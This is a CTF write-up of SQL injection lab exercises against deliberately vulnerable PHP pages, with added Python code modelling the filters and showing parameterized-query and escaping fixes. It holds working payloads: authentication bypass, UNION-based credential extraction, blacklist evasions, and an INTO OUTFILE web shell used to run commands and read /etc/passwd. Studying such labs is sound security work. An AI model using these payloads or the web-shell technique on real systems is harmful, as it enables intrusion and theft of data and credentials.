SQL injection Exercises
I could not solve one of the ctfs.me problems, so I googled for writeups and found that the challenge was taken from another problem set, whose original source is ... So I took the opportunity to work through that set of problems as well.
Level 1
This problem can actually be solved without the source code; it only needs a little thought.
$query = "SELECT * FROM secrets WHERE session_id = '" . $_POST['session_id'] . "'";
In this statement we need to make the WHERE condition always true, so we use OR; a relatively simple problem.
Payload: 1' or 1=1 #
Submitting it in "Get your secrets" returns all the secrets; the first one is the flag.
Level 2
This problem is in the same style as the ctfs.me one that I did not know how to do.
Without the source, my first thought was the universal-password login bypass, but after a lot of trying I found that injecting at the username field does not log you in. GG.
Change of approach: look at what the login page echoes back.
Payload: username=1' order by 1# &password=dd
Echo: Username/password is invalid
Payload: username=1' order by 2# &password=dd
Echo: Invalid SQL query
So there is only one column; next, find where the result is echoed.
Payload: username=1' union select 1 -- -&password=dd
Echo: ... the flag was returned, but the one shown on the page is not the real one; viewing the page source revealed another flag. Got it!
With the source code it is a bit simpler.
if (isset($_POST['username']) && isset($_POST['password'])) {
    // $query = "SELECT flag FROM my_secret_table"; We leave commented code in production because we're cool.
    $query = "SELECT username FROM users where username = '" . $_POST['username'] . "' and password = ?"; // We use prepared statements, it must be secure.
Construct the payload directly: username=1'union select flag from my_secret_table
Level 3 - The Blacklist Saga (Part 1)
$filter = array('union', 'select');
// Remove all banned characters
foreach ($filter as $banned) {
    $_GET['q'] = preg_replace('/' . $banned . '/i', '', $_GET['q']);
}
This filters the union and select keywords: preg_replace strips them, case-insensitively (the /i modifier).
I had previously seen the bypass uni/**/on, but that attempt does not work here ...
But because each keyword is replaced with an empty string, you can construct uniunionon: preg_replace removes the union in the middle of the string, and the remaining characters join back together into union.
Payload: 1'uniunionon seleselectct 1,username,password from users #
Simple process:
- Use order by to determine the number of columns: 1'order by 3#
- Then use the INFORMATION_SCHEMA database to look up the table name and column names.
- Get the flag.
Level 4 - The Blacklist Saga (Part 2)
$filter = array('UNION', 'SELECT');
// Remove all banned characters
foreach ($filter as $banned) {
    if (strpos($_GET['q'], $banned) !== false) die("Hacker detected");
    if (strpos($_GET['q'], strtolower($banned)) !== false) die("Hacker detected");
}
It checks the blacklist in all-uppercase and all-lowercase form only, not mixed case, so mixed case bypasses it.
Payload: 1'uNion Select 1,username,password from users #
Level 5 - The Blacklist Saga (Part 3)
// Ban space character
Spaces are filtered; to get around the space filter, use MySQL comments /**/ in their place.
Payload: 1'union/**/select/**/1,username,password/**/from/**/users/**/#
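As an added example (not code from the page), the three PHP blacklists from Levels 3 to 5 re-implemented in Python so the page's own payloads can be run through them, plus a fixed-point variant of the Level 3 filter that closes the uniunionon trick, and the actual fix that applies to Levels 1 and 2 as well: a parameterized query, shown here with sqlite3 and a constructed sample table, where the same input is bound as data and never parsed as SQL.

```python
import re
import sqlite3

# Python re-implementations of the Levels 3-5 PHP blacklists (added example).

def level3_filter(q: str) -> str:
    """Level 3: single-pass, case-insensitive removal of 'union' and 'select'."""
    for banned in ("union", "select"):
        q = re.sub(banned, "", q, flags=re.IGNORECASE)
    return q

def level4_filter_rejects(q: str) -> bool:
    """Level 4: reject only if a keyword appears in all-upper or all-lower case."""
    for banned in ("UNION", "SELECT"):
        if banned in q or banned.lower() in q:
            return True
    return False

def level5_filter_rejects(q: str) -> bool:
    """Level 5: reject if the input contains a space."""
    return " " in q

def level3_filter_fixed_point(q: str) -> str:
    """Repeat the Level 3 removal until nothing changes, so a keyword that one
    pass re-assembles (uniunionon -> union) is removed by the next pass.
    This closes that one trick but it is still a blacklist, not a fix."""
    while True:
        stripped = level3_filter(q)
        if stripped == q:
            return q
        q = stripped

def lookup_parameterized(user_input: str):
    """The real fix: bind the input as a parameter, so whatever it contains is
    compared as data by LIKE and never parsed as SQL."""
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE search_engine (title TEXT)")       # constructed sample data
    con.execute("INSERT INTO search_engine VALUES ('sqli notes')")
    rows = con.execute("SELECT title FROM search_engine WHERE title LIKE ?",
                       (user_input,)).fetchall()
    con.close()
    return rows

if __name__ == "__main__":
    print(level3_filter("1'uniunionon seleselectct 1,username,password from users #"))
    print(level4_filter_rejects("1'uNion Select 1,username,password from users #"))
    print(level5_filter_rejects("1'union/**/select/**/1,username,password/**/from/**/users/**/#"))
    print(lookup_parameterized("1' or 1=1 #"), lookup_parameterized("sqli%"))
```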
Level 6 - The Blacklist Saga (Part 4)
// Ban space character
if (strpos($_GET['q'], "'") !== false) die("Hacker detected");
if (strpos($_GET['q'], '"') !== false) die("Hacker detected");
Single and double quotes are filtered, but a payload can still be constructed by looking at the original SQL statement:
$query = "SELECT * FROM search_engine WHERE title LIKE '" . $_GET['q'] . "' OR description LIKE '" . $_GET['q'] . "' OR link LIKE '" . $_GET['q'] . "';";
Payload: and 0 union select 1,username,password from users #\
Concretely, the query becomes:
SELECT * FROM search_engine WHERE title LIKE 'and 0 union select 1,username,password from users #\' OR description LIKE 'and 0 union select 1,username,password from users #\' OR link LIKE 'and 0 union select 1,username,password from users #\';
There are 6 single quotes in total, but because of the backslash, the second, fourth and sixth single quotes are escaped. Writing SQL in place of the payload and 0 union select 1,username,password from users #\, the result is:
select * from search_engine where title like 'SQL \' or description like 'SQL \' or link like 'SQL\'
Removing the escaped single quotes:
select * from search_engine where title like 'SQL or description like 'SQL or link like 'SQL
Now put the payload back in place of SQL. Because the argument after title like, 'SQL or description like ', is a single string, the first SQL does not need to be restored; and since the payload ends with a comment character, everything after the second SQL in the statement above is commented out and can be omitted:
select * from search_engine where title like 'SQL or description like 'and 0 union select 1,username,password from users #
Or, a bit simpler:
select * from search_engine where title like 'xxxx' and 0 union select 1,username,password from users #
OK.
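As an added example (not code from the page), a Python model of the Level 6 query construction above together with a deliberately small lexer (single-quoted literals, backslash escapes, # comments only; this is an assumption about the parts of MySQL syntax that matter here) that shows why the trailing backslash turns the rest of the first LIKE clause into live SQL, and why escaping the backslash itself, as mysql_real_escape_string does (escape() below is a simplified stand-in), keeps all three values inside their literals. Parameterized queries remain the proper fix; this only explains the mechanism.

```python
TEMPLATE = ("SELECT * FROM search_engine WHERE title LIKE '{q}' "
            "OR description LIKE '{q}' OR link LIKE '{q}';")
PAYLOAD = "and 0 union select 1,username,password from users #\\"  # page's Level 6 payload; ends in one backslash

def build_query(q: str) -> str:
    """Mirror the PHP concatenation: the same input lands in all three LIKE clauses."""
    return TEMPLATE.format(q=q)

def sql_segments(sql: str):
    """Split into (kind, text) pieces, kind in {'code', 'string', 'comment'}.
    Simplified MySQL lexing: inside a '...' literal a backslash escapes the next
    character, and '#' outside a literal comments out the rest of the statement."""
    segments, buf, kind, i = [], "", "code", 0
    while i < len(sql):
        c = sql[i]
        if kind == "string":
            buf += c
            if c == "\\" and i + 1 < len(sql):   # escaped char cannot close the literal
                i += 1
                buf += sql[i]
            elif c == "'":
                segments.append(("string", buf))
                buf, kind = "", "code"
        elif c == "'":
            if buf:
                segments.append(("code", buf))
            buf, kind = c, "string"
        elif c == "#":
            if buf:
                segments.append(("code", buf))
            return segments + [("comment", sql[i:])]
        else:
            buf += c
        i += 1
    return segments + ([(kind, buf)] if buf else [])

def literal_count(q: str) -> int:
    """How many complete string literals the server sees (the PHP intends three)."""
    return sum(1 for k, _ in sql_segments(build_query(q)) if k == "string")

def live_sql_after_first_literal(q: str) -> str:
    """SQL that would actually execute after the first quoted value."""
    segs = sql_segments(build_query(q))
    first = next(i for i, (k, _) in enumerate(segs) if k == "string")
    return "".join(t for k, t in segs[first + 1:] if k == "code").strip()

def escape(q: str) -> str:
    """Escape backslashes and quotes (what mysql_real_escape_string would do here)."""
    return q.replace("\\", "\\\\").replace("'", "\\'")
```

With the raw payload the server sees one literal and then the injected clause; after escape() it sees the three literals the PHP intended and nothing else.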
Level 7
Do Level 8 first.
Level 8 - The Final Challenge
Viewing the source, I found two commented-out links:
<!--<li><a href="/uploads/">Our files</a></li>-->
<!--<li><a href="/phpinfo.php">Debug</a></li>-->
So uploaded files are kept under uploads.
phpinfo shows DOCUMENT_ROOT /var/www/html, which tells us the site's path on disk, so the SQL injection can write a PHP one-liner with INTO OUTFILE into a PHP file there.
Payload: 1 union select "<?php system($_GET[\"cmd\"]);?> ", "" into outfile "/var/www/html/uploads/temp2.php"#
35.184.20.243:8003/uploads/temp2.php?cmd=ls
Browsing the filesystem, the flag is in the top-level directory; read it with cat.
Level 7
Use Level 8's shell to cat /etc/passwd
to get the flag, or view Level 7's flag.php source file to get the flag.
But I think this is a bit off; there are probably other intended approaches I have not thought of.